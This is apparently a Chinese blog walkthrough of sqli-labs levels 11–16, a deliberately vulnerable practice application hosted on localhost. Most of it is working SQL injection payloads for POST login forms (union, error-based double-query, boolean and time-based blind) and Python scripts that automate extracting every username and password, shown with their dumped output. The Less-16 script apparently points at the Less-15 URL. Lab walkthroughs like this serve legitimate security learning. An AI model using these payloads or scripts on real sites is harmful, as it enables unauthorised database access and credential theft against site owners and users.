LESS 11 基于字符串的注入(POST)
在username栏输入单引号’测试,结果:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and password=’’ LIMIT 0,1’ at line 1
猜测查询语句为:select * from users where username = ‘$username’ and password=’$password’ LIMIT 0,1
于是乎构造payload:
Username : 0’ union select group_concat(username),group_concat(password) from users#
Password :
结果:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
LESS 12 基于双引号字符串的注入(POST)
和上一关的不同在于字符串被双引号和括号包围,通过报错讯息可以知道
payload如下:
Username : 0”) union select group_concat(username),group_concat(password) from users#
Password :
LESS 13 双查询注入(POST)
通过报错信息可以知道字符串被一对单引号和一对括号包围,但是成功后不显示信息,只会显示报错信息,于是使用双查询注入:
Username : 0’) union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :
结果:
Duplicate entry ‘13 : 1’ for key ‘group_key’’
可以构造脚本爆表:
from urllib import request from urllib import parse import re url = "http://localhost/sqli-labs-master/Less-13/" i = 0 while(i < 13): data = {"uname":"0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit "+str(i)+",1),(select password from users limit "+str(i)+",1),floor(rand()*2)) as a from users group by a#", "passwd":""} response = request.urlopen(url, parse.urlencode(data).encode()).read().decode() info = re.search(r"[^']+\s\|\s[^\s]+?", response) if(info == None): i -= 1 else: print(info.group()) i += 1 |
结果:
Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0
LESS 14 双引号双查询注入(POST)
除了把单引号括号改成双引号外和上一关没什么区别,payload:
Username : 0” union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :
其他的和十三关都是一样的
LESS 15 基于布尔的盲注(POST)
POST盲注,第七关的脚本拿过来改一下即可:
from urllib import request from urllib import parse import re url = "http://localhost/sqli-labs-master/Less-15/" def getLength(value): length = 0 while True: data = {"uname":"' or length("+str(value)+")="+str(length)+"#", "passwd":""} response = request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (re.search("slap", response)): length += 1 else: return length def getName(value): dbname = "" for n in range(getLength(value)): a = 64 b = 64 #使用二分法构造动态参数 while True: b = int(b/2) data = {"uname":"' or ascii(substr(" + value + "," + str(n+1) + "))<" + str(a) + "#", "passwd":""} response = request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (re.search("slap", response)): data["uname"] = "' or ascii(substr(" + value + "," + str(n+1) + "))=" + str(a) + "#" response = request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (re.search("slap", response)): a += b else: dbname = dbname + chr(a) break else: a -= b return dbname print(getName("(select group_concat(username) from users)")) print(getName("(select group_concat(password) from users)")) |
结果和第八关一样
LESS 16 基于时间的盲注(POST)
结合第九关的脚本,再改一下上一关的脚本就成了本关的脚本:
from urllib import request from urllib import parse import time url = "http://localhost/sqli-labs-master/Less-15/" def getLength(value): length = 0 while True: data = {"uname":"' or if(length("+value+")="+str(length)+",sleep(0.1),1)#", "passwd":""} t = time.time() request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (time.time()-t <= 0.1): length += 1 else: return length def getName(value): dbname = "" for n in range(getLength(value)): a = 64 b = 64 #使用二分法构造动态参数 while True: b = int(b/2) data = {"uname":"' or if(ascii(substr("+value+","+str(n+1)+"))<"+str(a)+",sleep(0.1),1)#", "passwd":""} t = time.time() request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (time.time()-t <= 0.1): data["uname"] = "' or if(ascii(substr("+value+","+str(n+1)+"))="+str(a)+",sleep(0.1),1)#" t = time.time() request.urlopen(url, parse.urlencode(data).encode()).read().decode() if (time.time()-t <= 0.1): a += b else: dbname = dbname + chr(a) break else: a -= b return dbname print(getName("(select group_concat(username) from users)")) print(getName("(select group_concat(password) from users)")) |
速度太慢,不知道有什么好的改进方法